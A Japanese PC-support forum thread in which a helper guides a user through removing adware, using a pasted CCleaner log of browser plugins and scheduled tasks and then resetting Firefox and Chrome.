有効 Plugin Google Update 1.3.21.123 最初�Eユーザー C:\Program Files (x86)\Google\Update\1.3.21.123\npGoogleUpdate3.dll
有効 Plugin Java Deployment Toolkit 6.0.200.2 6.0.200.2 最初�Eユーザー C:\Program Files (x86)\Java\jre6\bin\new_plugin\npdeployJava1.dll
有効 Plugin Java(TM) Platform SE 6 U20 6.0.200.2 最初�Eユーザー C:\Program Files (x86)\Java\jre6\bin\new_plugin\npjp2.dll
有効 Plugin Microsoft Office 2010 14.0.4730.1010 最初�Eユーザー C:\PROGRA~2\MICROS~4\Office14\NPAUTHZ.DLL
有効 Plugin Microsoft Office 2010 14.0.4761.1000 最初�Eユーザー C:\PROGRA~2\MICROS~4\Office14\NPSPWRAP.DLL
有効 Plugin Native Client 最初�Eユーザー C:\Program Files (x86)\Google\Chrome\Application\42.0.2311.135\ppGoogleNaClPluginChrome.dll
有効 Plugin Shockwave Flash 11.4.31.110 最初�Eユーザー C:\Program Files (x86)\Google\Chrome\Application\42.0.2311.135\PepperFlash\pepflashplayer.dll
有効 Plugin Silverlight Plug-In 4.1.10329.0 最初�Eユーザー c:\Program Files (x86)\Microsoft Silverlight\4.1.10329.0\npctrl.dll
有効 Plugin Trend Micro Titanium 5.11.0.2107 最初�Eユーザー C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\heoldelcflnigdllmlopiefhkkobendj\5.11.0.2107_0\npToolbarChrome.dll
有効 Plugin Windows LiveEPhoto Gallery 15.4.3502.0922_ship.wlx.w4m4 (ship) 最初�Eユーザー C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll

無効 Extension Browsers Apps 1.26.18 Opera Stable C:\Users\Owner\AppData\Roaming\Opera Software\Opera Stable\Extensions\ffhfoagmjcnkolneahbpagjcjjaeofbg\1.26.18_0
有効 Task Adobe Flash Player Updater Adobe Systems Incorporated C:\windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
有効 Task CCleanerSkipUAC Piriform Ltd "C:\Program Files\CCleaner\CCleaner.exe" $(Arg0)
有効 Task ConfigFree Startup Programs TOSHIBA CORPORATION C:\Program Files (x86)\TOSHIBA\ConfigFree\NDSTray.exe
無効 Task Driver Booster SkipUAC (Owner) C:\Program Files (x86)\IObit\Driver Booster\DriverBooster.exe /skipuac
有効 Task GoogleUpdateTaskMachineCore Google Inc. C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /c
有効 Task GoogleUpdateTaskMachineUA Google Inc. C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /ua /installsource scheduler
無効 Task PC SpeedScan Pro_Owner-PC@Owner C:\Program Files (x86)\Ascentive\PC SpeedScan Pro\PCSpeedScan.exe
無効 Task Performance Center@Logon C:\Program Files (x86)\Ascentive\Performance Center\APCMain.exe -m
有効 Task Uninstaller_SkipUac_Owner IObit C:\Program Files (x86)\IObit\IObit Uninstaller\IObitUninstaler.exe /UninstallExplorer
有効 Task {41F13D64-A3AF-4A61-9337-019875D0859A} Microsoft Corporation C:\windows\system32\pcalua.exe -a C:\Users\Owner\Downloads\HijackThis.exe -d C:\Users\Owner\Downloads

有効 Directory IObitUnstaler IObit C:\Program Files (x86)\IObit\IObit Uninstaller\UninstallMenuRight64.dll
有効 Drive Ulead UDF Driver Ulead Systems, Inc. c:\Program Files (x86)\Common Files\Ulead Systems\DVD\USIShex.dll
有効 File IObitUnstaler IObit C:\Program Files (x86)\IObit\IObit Uninstaller\UninstallMenuRight64.dll
有効 File {48F45200-91E6-11CE-8A4F-0080C81A28D4} Trend Micro Inc. C:\Program Files\NTTW\Security\UniClient\UiFrmwrk\tmdshell.dll
有効 Folder IObitUnstaler IObit C:\Program Files (x86)\IObit\IObit Uninstaller\UninstallMenuRight64.dll
有効 Folder {48F45200-91E6-11CE-8A4F-0080C81A28D4} Trend Micro Inc. C:\Program Files\NTTW\Security\UniClient\UiFrmwrk\tmdshell.dll
  • T・T
  • 2015/05/10 (Sun) 18:13:49
作業時の確認を
今日も遅くなってすみません。

>幾つか消せないものがありました。

はい、HJTでのBaidu残骸や、ブラウザのExtension Browsers Apps等ですね。
ですがHJTでの残骸は既に実質無効化されているので危険もないですから、これはスルーしてもいいです。
掃除できればしておこうかという程度の物です。

ただ一応確認ですが、CCでの各作業はPCを通常モードで行いましたか?
もしセーフモードで作業したなら、通常モードで再度CCでの作業をお願いします。
CCはセーフモードではいくつかの機能が正常に動作しないためです。

通常モードでもCCでの処置ができなければその旨レスで教えてください。

なお、自分が次のレスできるのは明後日以降になるので、申し訳ないですがご了承ください
  • 悪代官
  • 2015/05/10 (Sun) 21:39:10
Re: パソコン動作緩慢・広告類がひどい
遅れてすみませんCCは通常モードで行いました。
それで、前回のような結果になっています。
そうするとパソコンの動作は現在の状態以上は早くならないのでしょうか?
  • T・T
  • 2015/05/13 (Wed) 20:12:16
ブラウザの初期化しましょう
今日も遅くなってすみません。

>CCは通常モードで行いました。

はい、わかりました。ではこれはいいです。

それではまた次の作業です。
まずFirefoxの修正にかかります。

FF起動してアドレスバーに下記をコピペで貼り付けて移動です。
about:support

そこで「Firefoxをリフレッシュ」するとFFに入っている拡張が初期化されます。
これで不審拡張も掃除できる可能性があります。

FFを終了したら次はChromeです。
Chrome起動してやはり下記をコピペで貼り付けて移動です。
chrome://settings/

そこで最下段の「詳細設定を表示」してから更に最下段の「設定のリセット」を実行するとChromeもFF同様に初期化されます。

ここまでできたら一度PC再起動後、両ブラウザを起動してしばらく様子見したあと、CCでFFタブとChromeタブのログだけ取り直して、それを状態報告とともにレスください
  • 悪代官
  • 2015/05/13 (Wed) 22:24:40

返信フォーム






プレビュー (投稿前に内容を確認)